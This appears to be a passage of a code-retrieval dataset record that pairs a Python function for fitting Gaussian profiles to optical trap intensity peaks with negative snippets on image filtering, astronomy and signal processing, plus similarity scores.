cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n\treturn thresh", "def fmgf(array, sigma):\n x, y = np.arange(len(array)), array.copy()\n yg = ndimage.filters.gaussian_filter(y, sigma)\n y -= yg\n\n # digitizing\n m = 101\n dy = 6.0 * mad(y) / m\n ybin = np.arange(np.min(y) - 5 * dy, np.max(y) + 
5 * dy + dy, dy)\n z = np.zeros([len(ybin), len(x)])\n z[np.digitize(y, ybin), x] = 1.0\n\n # filtering\n g = partial(ndimage.filters.gaussian_filter, sigma=(0, sigma))\n c = partial(ndimage.filters.convolve1d, weights=np.ones(m), axis=0)\n zf = c(c(c(g(z))))\n\n # estimates\n ym1, y0, yp1 = [ybin[np.argmax(zf, 0) + i] for i in (-1, 0, 1)]\n zm1, z0, zp1 = [zf[np.argmax(zf, 0) + i, x] for i in (-1, 0, 1)]\n t = (zm1 - z0) / (zm1 - 2 * z0 + zp1)\n\n filtered = yg + ((1 - t) ** 2) * ym1 + (2 * t * (1 - t)) * y0 + (t**2) * yp1\n return filtered", "def calc_flux_array(self):\n \n # First determine the associated spectrum\n self.compute_template_spectrum()\n\n # Calculate baseline counts to normalise fluxes we scan over\n # Go from 10**(bin_min)*mean up to 10**(bin_max)*mean in nbins steps\n b = self.setup_b_instance(0,add_ps_mask=True)\n mean = np.sum(b.CTB_masked_compressed[0])/len(b.CTB_masked_compressed[0])\n A_array = mean*10**np.linspace(self.bin_min,self.bin_max,self.nbins)\n\n # Array to get LLs when no profile likelihood run\n norun = np.array([1.0, 1.0, 1.0, 1.0])\n\n # Now setup and compute the arrays\n LL_array = np.array([]) \n A_array_short = np.array([])\n spect_array = np.array([])\n\n for i in range(len(A_array)):\n print \"on i =\",i\n # Calculate LL\n if i == 0:\n b1 = self.setup_b_instance(A_array[i],add_ps_mask=True)\n else:\n for key in b1.fixed_template_dict_nested.keys():\n b1.fixed_template_dict_nested[key] = b1.fixed_template_dict_nested[key]*A_array[i]/A_array[i-1]\n ll_val = b1.ll(norun,4,4)\n # Make triangle\n\n # Append to arrays\n LL_array = np.append(LL_array,ll_val)\n A_array_short = np.append(A_array_short,A_array[i])\n spect_array = self.spectrum*np.array(A_array_short)\n\n # Save output\n np.save(work_dir+'ScanOutput/'+self.tag+'/En_array-'+str(self.flux_array_ebin)+'.npy',self.En_center)\n np.save(work_dir+'ScanOutput/'+self.tag+'/LL_array-'+str(self.flux_array_ebin)+'.npy',LL_array)\n np.save(work_dir+'ScanOutput/'+self.tag+'/Flux_array-'+str(self.flux_array_ebin)+'.npy',spect_array)", "def extract_features(img, thr=0.005):\n if img.ndims == 3:\n img = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n\n detector = cv2.AKAZE_create()\n (kpts, descs) = detector.detectAndCompute(img, None)\n return kpts, descs", "def _compute_supersky(self, starMasks):\n # TODO: break this into more managably bite sized bits if necessary.\n\n # Construct a median normalized data stack\n dataStack = np.zeros(self.shape, dtype=np.float32)\n\n # Loop through each image, normalize and place in data stack\n for imgNum, img in enumerate(self.imageList):\n # Copy the data for this image\n thisData = img.data\n\n # Mask this image with its starMask\n starInds = np.where(starMasks[imgNum, :, :])\n thisData[starInds] = np.NaN\n\n # Compute the median of this image\n thisMedian = np.nanmedian(thisData)\n\n # Median normalize this image\n thisData /= thisMedian\n\n # Place the normalized image in its place\n dataStack[imgNum, :, :] = thisData\n\n # Compute the median image (ignore warnings because we'll fix those)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n medianArray = np.nanmedian(dataStack, axis=0)\n\n # Comptue uncertainty as standard deviation/sqrt(numOfUnmaskedPixels)\n stdArray = np.nanstd(dataStack, axis=0)\n numPix = np.nansum(dataStack, axis=0)\n uncertArray = stdArray/np.sqrt(numPix - 1)\n\n # Renormalize by this output median\n thisMedian = np.nanmedian(medianArray)\n medianArray /= thisMedian\n uncertArray /= np.abs(thisMedian)\n\n # Return to user\n return 
medianArray, uncertArray", "def find_gaussian(img,sigma=25):\n method = 'cv2.TM_CCOEFF_NORMED'\n size=3*sigma\n template = gaussian(size,sigma)\n template/=template.max()\n template*=255\n template = template.astype(np.uint8)\n \n threshold = 0.9\n w, h = template.shape[::-1]\n \n img2 = img.copy()\n meth = eval(method)\n\n # Apply template Matching\n res = cv2.matchTemplate(img2,template,meth)\n #Filters location map so that only one gaussian is found per contiguous location\n location_map = res >= threshold*np.max(res)\n location_map,nr = ndi.label(location_map)\n list_x = []\n list_y = []\n for label in range(1,nr+1):\n tmp=location_map==label\n if np.count_nonzero(tmp)>1:\n points = np.where(tmp)\n l = len(points[0])\n cx = (np.sum(points[0]) + l/2)/l\n cy = (np.sum(points[1]) + l/2 )/l\n list_x.append(cx)\n list_y.append(cy)\n loc= (np.asarray(list_x),np.asarray(list_y))\n stack_to_remove = np.zeros((size,size,len(loc[0])))\n i=0\n for pt in zip(*loc[::-1]):\n cv2.rectangle(img2, pt, (pt[0] + w, pt[1] + h), 255, 2)\n stack_to_remove[:,:,i] = img[pt[1]:pt[1]+w,pt[0]:pt[0]+h]\n i+=1\n return stack_to_remove,loc", "def ts_method(signal, peaks, template_duration: float = 0.12, fs: int = processing.FS, window: int = 10, **kwargs):\n\n t_dur = round(template_duration * fs)\n if not t_dur % 2 == 0:\n t_dur += 1\n dims = signal.shape\n # if np.max(np.abs(signal[0, :])) < np.max(np.abs(signal[1, :])):\n # r_peaks = find_qrs(signal[1, :], peak_search=peak_search)\n # r_peaks = peak_enhance(signal[1, :], peaks=r_peaks, window=0.2)\n # else:\n # processing.scatter_beautiful(r_peaks * 1000 / fs, title='peaks')\n extracted_signal = np.copy(signal)\n # print(len(r_peaks))\n # Please, rework it...\n for n in range(dims[0]):\n for i in range(0, len(peaks), window):\n\n if i + window > len(peaks):\n r_peaks = peaks[i:]\n else:\n r_peaks = peaks[i:i + window]\n\n template = np.full((len(r_peaks), t_dur), np.nan)\n for num, r_ind in enumerate(r_peaks):\n if r_ind < t_dur // 2:\n template[num, t_dur // 2 - r_ind - 1:] = extracted_signal[n, 0:r_ind + t_dur // 2 + 1]\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n template[num, 0:dims[1] - r_ind + t_dur // 2] = extracted_signal[n, r_ind - t_dur // 2:]\n else:\n template[num] = extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2]\n template_mean = np.nanmean(template, axis=0) # None for edge cases\n for r_ind in r_peaks:\n if r_ind < t_dur // 2:\n extracted_signal[n, 0:r_ind + t_dur // 2 + 1] -= template_mean[t_dur // 2 - r_ind - 1:]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel start ' + str(n))\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2 + 1] -= template_mean[\n 0:dims[1] - r_ind + t_dur // 2]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel end ' + str(n))\n else:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2] -= template_mean\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel ' + str(n))\n return extracted_signal", "def gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n gauss_pyramid = [img]\r\n gArr = cv2.getGaussianKernel(5, -1)\r\n gKernel = gArr @ gArr.transpose()\r\n for i in range(1, levels):\r\n It = cv2.filter2D(gauss_pyramid[i-1], -1, gKernel)\r\n It = It[::2, ::2]\r\n gauss_pyramid.append(It)\r\n\r\n return gauss_pyramid", "def extract_statistics(transformed: np.ndarray) -> np.ndarray:\n ecg_features = []\n print(\"Extracting statistics from transformed 
signals...\")\n\n for x in tqdm(transformed):\n median_temp = np.median(x[:, :-1], axis=0)\n mad_temp = median_abs_deviation(x[:, :-1], axis=0)\n\n median_hr = np.median(x[:, -1], keepdims=True)\n mad_hr = median_abs_deviation(x[:, -1]).reshape([-1])\n\n features = np.concatenate([median_temp, mad_temp, median_hr, mad_hr])\n ecg_features.append(features)\n\n return np.array(ecg_features)", "def extract_anisotropy_features (Parameters, image, mask=None):\n \n data_inputs = {}\n \n Ka, Kb, Kc = Parameters.kA, Parameters.kB, Parameters.kC\n \n \n h, w, channels = image.shape\n \n if channels == 2:\n channel_types = [\"Para\", \"Perp\"]\n elif channels == 3:\n channel_types = [\"Open\", \"Para\", \"Perp\"]\n \n \n for index, channel in enumerate(channel_types):\n \n data_inputs[channel] = np.sum(image[:,:, index])/np.count_nonzero(image[:,:, index])\n\n\n #Additional parameters\n para_value = data_inputs['Para']\n perp_value = data_inputs['Perp']\n data_inputs['AniAvg'] = (para_value - perp_value)/(para_value + 2*perp_value)\n \n #With corrections\n data_inputs['Ix'] = Ix = ((Ka+Kb)*perp_value - (Ka+Kc)*para_value)/(Ka*Kb + Kb*Kb - Ka*Kc - Kc*Kc)\n data_inputs['Iy'] = Iy = (Kb*para_value - Kc*perp_value)/(Ka*Kb + Kb*Kb - Ka*Kc - Kc*Kc)\n data_inputs['AniAvg'] = (Ix - Iy)/(Ix + 2*Iy)\n \n\n \n return (data_inputs)", "def build_zigzag_times(rips,n,numbins):\n times = [[] for x in range(0,rips.__len__())]\n i=0\n for x in rips:\n dim = x.dimension()\n t = [];\n for k in range(0,dim+1):\n t.append(x[k])\n xmin = math.floor(min(t)/n)\n xmax = math.floor(max(t)/n)\n if xmax == 0:\n bd = [0,1]\n elif xmin == numbins-1:\n bd = [2*xmin-1,2*xmin]\n elif xmax == xmin:\n bd = [2*xmin-1,2*xmin+1]\n elif xmax > xmin:\n bd = [2*xmax-1,2*xmax-1]\n else:\n print(\"Something has gone horribly wrong!\")\n times[i] = bd\n i = i+1\n return times", "def search_peaks(self, image):\n table = Table()\n if not isinstance(image, np.ndarray):\n return table\n\n search_image = image\n if self.smooth:\n with catch_warnings():\n simplefilter('ignore')\n search_image = convolve_fft(\n search_image, Gaussian2DKernel(self.sigma),\n normalize_kernel=True,\n preserve_nan=True)\n\n # always replace NaNs with median level: DAOStarFinder\n # won't find sources with NaN on top\n nval = np.isnan(search_image)\n search_image[nval] = np.median(search_image[~nval])\n\n # always take absolute value for fitting purposes\n search_image = abs(search_image)\n\n threshold = np.array([np.nanmin(search_image),\n np.nanmax(search_image)])\n threshold *= [0.9, 1.1]\n if threshold[0] < 0: # pragma: no cover\n threshold[0] = 0.\n\n self.iteration = 0\n while self.iteration < self.maxiter:\n self.iteration += 1\n with catch_warnings():\n simplefilter('ignore', AstropyWarning)\n self.threshold = threshold.mean()\n finder = DAOStarFinder(\n self.threshold, self.fwhm,\n sharplo=self.sharplo, sharphi=self.sharphi,\n roundlo=self.roundlo, roundhi=self.roundhi)\n table = finder.find_stars(search_image)\n self.chopnod_sort(table)\n\n if self.refine and self.positive:\n self.refine_table(image, table)\n if not table:\n nfound = 0\n else:\n nfound = len(table)\n\n if abs(threshold[0] - threshold[1]) < self.eps and (\n nfound != self.npeaks):\n self.print('Min/max interval is null, breaking loop at '\n 'iteration #%s' % self.iteration)\n return table\n elif nfound < self.npeaks:\n threshold[1] = self.threshold\n elif nfound > self.npeaks:\n threshold[0] = self.threshold\n else:\n return table\n else:\n return table", "def create_gaussian_array(self):\n\n # 
Fill array of size l x w with Gaussian Noise.\n terrain_length = int(ceil(self.length/self.resolution))\n terrain_width = int(ceil(self.width/self.resolution))\n gaussian_array = np.random.normal(self.mu, self.sigma, (terrain_length,terrain_width))\n\n # Filter the array to smoothen the variation of the noise\n gaussian_array = gaussian_filter(gaussian_array, self.sigma_filter)\n\n return gaussian_array", "def _screen_by_snr(self,\n array: np.ndarray,\n is_smoothed: bool,\n keep_negative: bool) -> np.ndarray:\n n_gates, _, saturation_noise, noise_min = self.noise_params\n noise_min = noise_min[0] if is_smoothed is True else noise_min[1]\n noise = _estimate_noise_from_top_gates(array, n_gates, noise_min)\n array = self._reset_low_values_above_saturation(array, saturation_noise)\n array = self._remove_noise(array, noise, keep_negative)\n return array" ]
[ "0.5896619", "0.5877746", "0.52297366", "0.5136815", "0.50773364", "0.504893", "0.50198776", "0.4991051", "0.49902415", "0.4987427", "0.4953718", "0.4843196", "0.48095766", "0.48035288", "0.479248", "0.47632834", "0.4758519", "0.47351038", "0.47328326", "0.4723849", "0.4702265", "0.46986237", "0.46973252", "0.46955433", "0.46665666", "0.46371087", "0.4629789", "0.4593697", "0.4585569", "0.457788", "0.4570373", "0.45597613", "0.4548427", "0.45269942", "0.4519822", "0.45122102", "0.4506112", "0.44978294", "0.4485861", "0.44839486", "0.44684196", "0.4454845", "0.44409993", "0.44336858", "0.44205695", "0.44197884", "0.4414834", "0.4409965", "0.44067237", "0.44012603", "0.4391486", "0.4387931", "0.43780383", "0.436045", "0.43513215", "0.4349876", "0.4345894", "0.43379366", "0.43303996", "0.43216345", "0.43212214", "0.4319174", "0.43162397", "0.43150362", "0.431432", "0.43135822", "0.43032873", "0.4300566", "0.42999196", "0.42990294", "0.42926008", "0.4290893", "0.42843837", "0.42818123", "0.4278887", "0.42783886", "0.42760482", "0.42705485", "0.42650598", "0.42611873", "0.4259252", "0.4256837", "0.4253098", "0.4246229", "0.42459166", "0.42455697", "0.42443842", "0.4239663", "0.4238853", "0.42382583", "0.423618", "0.42331132", "0.42329153", "0.42311934", "0.4230878", "0.42305103", "0.4229905", "0.42279017", "0.42122227", "0.42117012" ]
0.52466863
2
Scans the given image for the 'ntraps' number of trap intensity peaks. Then extracts the 1dimensional gaussian profiles across the traps and returns a list of the amplitudes.
def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False): threshes = [0.5, 0.6] margin = 10 threshold = np.max(image) * threshes[which_cam] im = image.transpose() x_len = len(im) peak_locs = np.zeros(x_len) peak_vals = np.zeros(x_len) ## Trap Peak Detection ## for i in range(x_len): if i < margin or x_len - i < margin: peak_locs[i] = 0 peak_vals[i] = 0 else: peak_locs[i] = np.argmax(im[i]) peak_vals[i] = max(im[i]) ## Trap Range Detection ## first = True pos_first, pos_last = 0, 0 left_pos = 0 for i, p in enumerate(peak_vals): if p > threshold: left_pos = i elif left_pos != 0: if first: pos_first = (left_pos + i) // 2 first = False pos_last = (left_pos + i) // 2 left_pos = 0 ## Separation Value ## separation = (pos_last - pos_first) / ntraps # In Pixels ## Initial Guesses ## means0 = np.linspace(pos_first, pos_last, ntraps).tolist() waists0 = (separation * np.ones(ntraps) / 2).tolist() ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist() _params0 = [means0, waists0, ampls0, [0.06]] params0 = [item for sublist in _params0 for item in sublist] ## Fitting ## if verbose: print("Fitting...") xdata = np.arange(x_len) popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0), xdata, peak_vals, p0=params0) if verbose: print("Fit!") plt.figure() plt.plot(xdata, peak_vals) # Data if iteration: plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit plt.title("Iteration: %d" % iteration) else: plt.title("Final Product") plt.xlim((pos_first - margin, pos_last + margin)) plt.legend(["Data", "Guess", "Fit"]) plt.show(block=False) print("Fig_Newton") trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps]) return trap_powers
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def trapfilt_taps(N, phil, alfa):\n\n\n\n tt = arange(-N/2,N/2 + 1) # Time axis for h(t) \n # ***** Generate impulse response ht here *****\n ht = zeros(len(tt))\n ix = where(tt != 0)[0]\n if alfa != 0:\n ht[ix] = ((sin(2*pi*phil*tt[ix]))/(pi*tt[ix]))*((sin(2*pi*alfa*phil*tt[ix]))/(2*pi*alfa*phil*tt[ix]))\n else:\n ht[ix] = (sin(2*pi*phil*tt[ix]))/(pi*tt[ix])\n ix0 = where(tt == 0)[0]\n ht[ix0] = 2*phil\n ht = ht/sum(power(ht,2))\n\n return ht", "def guess_image(which_cam, image, ntraps):\n threshes = [0.5, 0.65]\n ## Image Conditioning ##\n margin = 10\n threshold = np.max(image)*threshes[which_cam]\n im = image.transpose()\n\n x_len = len(im)\n peak_locs = np.zeros(x_len)\n peak_vals = np.zeros(x_len)\n\n ## Trap Peak Detection ##\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n peak_locs[i] = 0\n peak_vals[i] = 0\n else:\n peak_locs[i] = np.argmax(im[i])\n peak_vals[i] = max(im[i])\n\n ## Trap Range Detection ##\n first = True\n pos_first, pos_last = 0, 0\n left_pos = 0\n for i, p in enumerate(peak_vals):\n if p > threshold:\n left_pos = i\n elif p < threshold and left_pos != 0:\n if first:\n pos_first = (left_pos + i) // 2\n first = False\n pos_last = (left_pos + i) // 2\n left_pos = 0\n\n ## Separation Value ##\n separation = (pos_last - pos_first) / ntraps # In Pixels\n\n ## Initial Guesses ##\n means0 = np.linspace(pos_first, pos_last, ntraps).tolist()\n waists0 = (separation * np.ones(ntraps) / 2).tolist()\n ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()\n _params0 = [means0, waists0, ampls0, [0.06]]\n params0 = [item for sublist in _params0 for item in sublist]\n\n xdata = np.arange(x_len)\n plt.figure()\n plt.plot(xdata, peak_vals)\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess\n plt.xlim((pos_first - margin, pos_last + margin))\n plt.legend([\"Data\", \"Guess\", \"Fit\"])\n plt.show(block=False)", "def gaussianFilter(gain,BT,spSym,nTaps):\n\n a = np.sqrt(np.log(2)/2)/BT\n t = np.linspace(-.5*nTaps,.5*nTaps-1,nTaps)/spSym\n\n ft = np.sqrt(np.pi)/a *np.exp(-(np.pi**2*(t)**2)/a**2)\n ft /= np.sum(ft) * gain # normalize filter\n\n return ft", "def gaussian_proba_map(img):\n method = 'cv2.TM_CCOEFF_NORMED'\n sigmas = [41,31,21,11]\n out = np.zeros(img.shape)\n for sigma in sigmas:\n size=3*sigma\n template = gaussian(size,sigma)\n template/=template.max()\n template*=255\n template = template.astype(np.uint8)\n \n img2 = img.copy()\n meth = eval(method)\n # Apply template Matching\n res = cv2.matchTemplate(img2,template,meth)\n res = np.pad(res,size/2,mode='constant')\n to_replace = res>out\n out[to_replace] = res[to_replace]\n return out", "def compute_tap_features(xtaps, ytaps, t, threshold=20):\n import numpy as np\n\n from mhealthx.extractors.tapping import compute_drift, \\\n compute_tap_intervals, compute_intertap_gap\n from mhealthx.extractors.tapping import TapFeatures as T\n from mhealthx.signals import signal_features\n\n if isinstance(xtaps, list):\n xtaps = np.array(xtaps)\n if isinstance(ytaps, list):\n ytaps = np.array(ytaps)\n if isinstance(t, list):\n t = np.array(t)\n\n # Intertap intervals:\n ipress, intervals = compute_tap_intervals(xtaps, t, threshold)\n\n # Filter data:\n t = t[ipress]\n xtaps = xtaps[ipress]\n ytaps = ytaps[ipress]\n\n # Delta between fastest and slowest intertap intervals:\n T.intertap_gap10, T.intertap_gap25, \\\n T.intertap_gap50 = compute_intertap_gap(intervals)\n\n # Left and right taps and drift:\n mean_x = np.mean(xtaps)\n iL = np.where(xtaps < mean_x)\n iR = 
np.where(xtaps >= mean_x)\n xL = xtaps[iL]\n yL = ytaps[iL]\n xR = xtaps[iR]\n yR = ytaps[iR]\n driftL = compute_drift(xL, yL)\n driftR = compute_drift(xR, yR)\n\n # Number of taps:\n T.num_taps = xtaps.size\n T.num_taps_left = xL.size\n T.num_taps_right = xR.size\n\n # Time:\n T.time_rng = t[-1] - t[0]\n\n # Intertap interval statistics:\n T.intertap_num, T.intertap_min, T.intertap_max, T.intertap_rng, \\\n T.intertap_avg, T.intertap_std, T.intertap_med, T.intertap_mad, \\\n T.intertap_kurt, T.intertap_skew, T.intertap_cvar, T.intertap_lower25, \\\n T.intertap_upper25, T.intertap_inter50, T.intertap_rms, \\\n T.intertap_entropy, T.intertap_tk_energy = signal_features(intervals)\n\n # Tap statistics:\n T.xL_num, T.xL_min, T.xL_max, T.xL_rng, T.xL_avg, T.xL_std, \\\n T.xL_med, T.xL_mad, T.xL_kurt, T.xL_skew, T.xL_cvar, \\\n T.xL_lower25, T.xL_upper25, T.xL_inter50, T.xL_rms, \\\n T.xL_entropy, T.xL_tk_energy = signal_features(xL)\n\n T.xR_num, T.xR_min, T.xR_max, T.xR_rng, T.xR_avg, T.xR_std, \\\n T.xR_med, T.xR_mad, T.xR_kurt, T.xR_skew, T.xR_cvar, \\\n T.xR_lower25, T.xR_upper25, T.xR_inter50, T.xR_rms, \\\n T.xR_entropy, T.xR_tk_energy = signal_features(xR)\n\n # T.yL_num, T.yL_min, T.yL_max, T.yL_rng, T.yL_avg, T.yL_std, \\\n # T.yL_med, T.yL_mad, T.yL_kurt, T.yL_skew, T.yL_cvar, \\\n # T.yL_lower25, T.yL_upper25, T.yL_inter50, T.yL_rms, \\\n # T.yL_entropy, T.yL_tk_energy = signal_features(yL)\n\n # T.yR_num, T.yR_min, T.yR_max, T.yR_rng, T.yR_avg, T.yR_std, \\\n # T.yR_med, T.yR_mad, T.yR_kurt, T.yR_skew, T.yR_cvar, \\\n # T.yR_lower25, T.yR_upper25, T.yR_inter50, T.yR_rms, \\\n # T.yR_entropy, T.yR_tk_energy = signal_features(yR)\n\n # Drift statistics:\n T.driftL_num, T.driftL_min, T.driftL_max, T.driftL_rng, T.driftL_avg, \\\n T.driftL_std, T.driftL_med, T.driftL_mad, T.driftL_kurt, T.driftL_skew, \\\n T.driftL_cvar, T.driftL_lower25, T.driftL_upper25, T.driftL_inter50, \\\n T.driftL_rms, T.driftL_entropy, T.driftL_tk_energy = \\\n signal_features(driftL)\n\n T.driftR_num, T.driftR_min, T.driftR_max, T.driftR_rng, T.driftR_avg, \\\n T.driftR_std, T.driftR_med, T.driftR_mad, T.driftR_kurt, T.driftR_skew, \\\n T.driftR_cvar, T.driftR_lower25, T.driftR_upper25, T.driftR_inter50, \\\n T.driftR_rms, T.driftR_entropy, T.driftR_tk_energy = \\\n signal_features(driftR)\n\n return T", "def extract_features(img, sigmas, n_features): \n dims = img.shape # dimensions of the image\n \n features = np.zeros((dims[0], dims[1], n_features)) # each feature map has the same size as the input image\n \n # the first feature we use is the pixel intensity in the green channel itself\n img_g = img[:,:,1] #I just assume it follows the RGB convention and not GBR or BGR...\n features[:,:,0] = img_g\n features[:,:,1] = np.sum(img,axis=2) \n \n gabors = get_gabors() \n \n # >>> YOUR CODE STARTS HERE <<<\n i = 2\n# for s in sigmas:\n# gfilters = gauss_filter(s)\n# for gf in gfilters:\n# features[:,:,i] = scipy.signal.fftconvolve(img_g, gf, mode='same') ;i+=1\n for s in sigmas:\n gauss = gauss_filter(s)\n for g in gauss:\n features[:,:,i] = scipy.signal.fftconvolve(img_g, g, mode='same') ;i+=1\n \n for gabor in gabors:\n features[:,:,i] = scipy.signal.fftconvolve(img_g, gabor, mode='same') ;i+=1\n \n \n features[:,:,i] = sobel(img_g, axis=0) ;i+=1\n features[:,:,i] = sobel(img_g, axis=1) ;i+=1\n features[:,:,i] = sobel(img_g, axis=0)+sobel(img_g, axis=1) ;i+=1\n features[:,:,i] = feature.canny(img_g, sigma=0.0) ;i+=1\n features[:,:,i] = feature.canny(img_g, sigma=0, low_threshold=13, high_threshold=50);i+=1\n 
features[:,:,i] = feature.canny(img_g, sigma=1)\n # >>> YOUR CODE ENDS HERE <<< \n \n return features", "def read_amplification(amp_file = 'dist.dat'):\n n_img, amp_img = np.loadtxt(amp_file, usecols=(0, 6), unpack=True)\n\n amp = []\n\n amp_tmp = []\n\n count = 1\n\n for i in range(len(n_img)):\n if count == n_img[i]:\n amp_tmp.append( amp_img[i] )\n else:\n amp.append(amp_tmp)\n\n amp_tmp = []\n\n amp_tmp.append( amp_img[i] )\n\n count = count + 1\n amp.append(amp_tmp)\n\n return amp", "def cs4243_gauss_pyramid(image, n=3):\n kernel = cs4243_gaussian_kernel(7, 1)\n pyramid = []\n ## your code here####\n\n pyramid = [image]\n for i in range(n):\n gpyr_image = cs4243_filter_faster(pyramid[i], kernel)\n gpyr_image = cs4243_downsample(gpyr_image, 2)\n pyramid.append(gpyr_image)\n \n ##\n return pyramid", "def gaussianarray1d(x, x0_vec, wx_vec, A_vec, offset, ntraps):\n array = np.zeros(np.shape(x))\n for k in range(ntraps):\n array = array + gaussian1d(x, x0_vec[k], wx_vec[k], A_vec[k], 0)\n return array + offset", "def get_gaussian_ff_top(self, filenames):\n amber_ffs = []\n for fname in filenames:\n amber_ffs.append(self._get_gaussian_ff_top_single(filename=fname))\n return amber_ffs", "def get_fluxes_within_mask(tpf, aper_mask, gaia_sources):\n assert tpf is not None\n assert aper_mask is not None\n assert gaia_sources is not None\n ra, dec = gaia_sources[[\"ra\", \"dec\"]].values.T\n pix_coords = tpf.wcs.all_world2pix(np.c_[ra, dec], 0)\n contour_points = measure.find_contours(aper_mask, level=0.1)[0]\n isinside = [\n is_point_inside_mask(contour_points, pix) for pix in pix_coords\n ]\n min_gmag = gaia_sources.loc[isinside, \"phot_g_mean_mag\"].min()\n gamma = gaia_sources.loc[isinside, \"phot_g_mean_mag\"].apply(\n lambda x: 10 ** (0.4 * (min_gmag - x))\n )\n return gamma", "def compute_tap_intervals(xtaps, t, threshold=20):\n import numpy as np\n\n if isinstance(xtaps, list):\n xtaps = np.asarray(xtaps)\n if isinstance(t, list):\n t = np.asarray(t)\n\n # Set time points:\n tap_times = t - t[0]\n\n # Calculate x offset:\n xtaps_offset = xtaps - np.mean(xtaps)\n\n # Find left/right finger \"press\" events:\n dx = xtaps_offset[1:] - xtaps_offset[:-1]\n ipress = np.where(np.abs(dx) > threshold)\n\n # Filter data:\n #xtaps = xtaps[ipress]\n tap_times = tap_times[ipress]\n\n # Find press event intervals:\n tap_intervals = tap_times[1:] - tap_times[:-1]\n\n return ipress, tap_intervals", "def smooth_spectra(xarr, farr, sigma=3, nkern=20):\n xkern = np.arange(nkern)\n kern = np.exp(-(xkern - 0.5 * nkern) ** 2 / (sigma) ** 2)\n\n return gaussian_filter1d(farr, sigma)", "def _get_features_from_batch_images(self, img, r, p):\n tmp_feats = []\n for channel in range(4):\n current_img = img[channel, :, :]\n tmp_feats = np.append(tmp_feats, np.histogram(current_img)[0])\n # extract 8*8 patches of 64*64 px and derive 10 bins histogram\n for j in range(r):\n for k in range(r):\n tmp_feats = np.append(\n tmp_feats,\n np.histogram(current_img[j * p:(j + 1) * (p), k *\n p:(k + 1) * p])[0])\n return tmp_feats", "def features_sigma(img,\n sigma,\n intensity=True,\n edges=True,\n texture=True):\n\n features = []\n\n gx,gy = np.meshgrid(np.arange(img.shape[1]), np.arange(img.shape[0]))\n # print(gx.shape)\n #features.append(gx)\n gx = filters.gaussian(gx, sigma)\n gy = filters.gaussian(gy, sigma)\n\n features.append(np.sqrt(gx**2 + gy**2)) #use polar radius of pixel locations as cartesian coordinates\n\n del gx, gy\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Location 
features extracted using sigma= %f' % (sigma))\n\n img_blur = filters.gaussian(img, sigma)\n\n if intensity:\n features.append(img_blur)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Intensity features extracted using sigma= %f' % (sigma))\n\n if edges:\n features.append(filters.sobel(img_blur))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Edge features extracted using sigma= %f' % (sigma))\n\n if texture:\n H_elems = [\n np.gradient(np.gradient(img_blur)[ax0], axis=ax1)\n for ax0, ax1 in itertools.combinations_with_replacement(range(img.ndim), 2)\n ]\n\n eigvals = feature.hessian_matrix_eigvals(H_elems)\n del H_elems\n\n for eigval_mat in eigvals:\n features.append(eigval_mat)\n del eigval_mat\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Texture features extracted using sigma= %f' % (sigma))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Image features extracted using sigma= %f' % (sigma))\n\n return features", "def repIpdTft(length,gammas,epsilon):\r\n avgRewards = []\r\n for gamma in gammas: \r\n avgRewards.append(np.mean(ipdTft(length,gamma,epsilon)))\r\n return(avgRewards)", "def sample(self, n_samps):\n # print('gauss trying to sample '+str(n_samps)+' from '+str(self.dist))\n # xs = np.array([self.sample_one() for n in range(n_samps)])\n xs = np.array(self.dist.sample(n_samps))\n # print('gauss sampled '+str(n_samps)+' from '+str(self.dist))\n return xs", "def extract_features(\n img,\n n_sigmas,\n multichannel=True,\n intensity=True,\n edges=True,\n texture=True,\n sigma_min=0.5,\n sigma_max=16,\n):\n if multichannel: #img.ndim == 3 and multichannel:\n all_results = (\n extract_features_2d(\n dim,\n img[..., dim],\n n_sigmas,\n intensity=intensity,\n edges=edges,\n texture=texture,\n sigma_min=sigma_min,\n sigma_max=sigma_max,\n )\n for dim in range(img.shape[-1])\n )\n features = list(itertools.chain.from_iterable(all_results))\n else:\n features = extract_features_2d(0,\n img,\n n_sigmas,\n intensity=intensity,\n edges=edges,\n texture=texture,\n sigma_min=sigma_min,\n sigma_max=sigma_max,\n )\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Feature extraction complete')\n\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n logging.info('Memory mapping features to temporary file')\n\n features = memmap_feats(features)\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n return features #np.array(features)", "def t1_hypointensity( x, xsegmentation, xWMProbability, template, templateWMPrior, wmh_thresh=0.1 ):\n mybig = [88,128,128]\n templatesmall = ants.resample_image( template, mybig, use_voxels=True )\n qaff = 